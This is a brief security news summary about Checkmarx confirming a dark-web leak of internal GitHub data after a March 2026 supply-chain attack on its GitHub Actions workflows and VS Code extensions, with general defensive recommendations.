Checkmarx Confirms Dark Web Leak of GitHub Data Tied to March 2026 Supply Chain Attack

Context On March 23, 2026, attackers compromised Checkmarx’s software supply chain by tampering with two GitHub Actions workflows and two VS Code extensions distributed via the Open VSX marketplace. The malicious code installed a credential stealer that harvested developer secrets. Threat actor TeamPCP claimed responsibility, and the financially motivated LAPSUS$ group later claimed to have posted Checkmarx‑related data on its leak site. Checkmarx’s investigation found that the exposed data originated from a separate GitHub repository used for internal development, not from its customer‑facing production environment.

Key Facts - The dark web post contains source code, an employee database, API keys, and MongoDB/MySQL credentials. - Checkmarx has locked down access to the affected GitHub repository as part of its incident response. - The company emphasizes that no customer data resides in the repository and will notify stakeholders if that changes. - Forensic analysis is ongoing to verify the full scope of the leaked material.

What It Means The incident illustrates how a single compromised build tool can cascade into credential theft and potential further intrusions. Exposed API keys and database credentials could allow attackers to pivot into internal systems or abuse third‑party services. Employee data increases the risk of targeted phishing or social‑engineering campaigns. While customer data appears unaffected, the breach erodes trust in Checkmarx’s own security controls and highlights the need for rigorous supply‑chain hygiene.

What Defenders Should Do - Rotate all API keys, secrets, and credentials stored in the affected repository immediately. - Audit GitHub Actions workflows and third‑party extensions for unauthorized changes; enforce signed commits and require approvals for workflow edits (MITRE ATT&CK T1195.002). - Enable multi‑factor authentication and least‑privilege access for all developer accounts (T1078.004). - Deploy detection rules for known credential‑stealer indicators (e.g., suspicious PowerShell or JavaScript execution, T1059.007). - Review software bill of materials (SBOM) for all dependencies and apply patches for vulnerable components as advisories are released.

Watch for any follow‑up notifications from Checkmarx regarding customer data, additional dark‑web postings, or advisories from CISA related to the Trivy‑style supply chain compromise.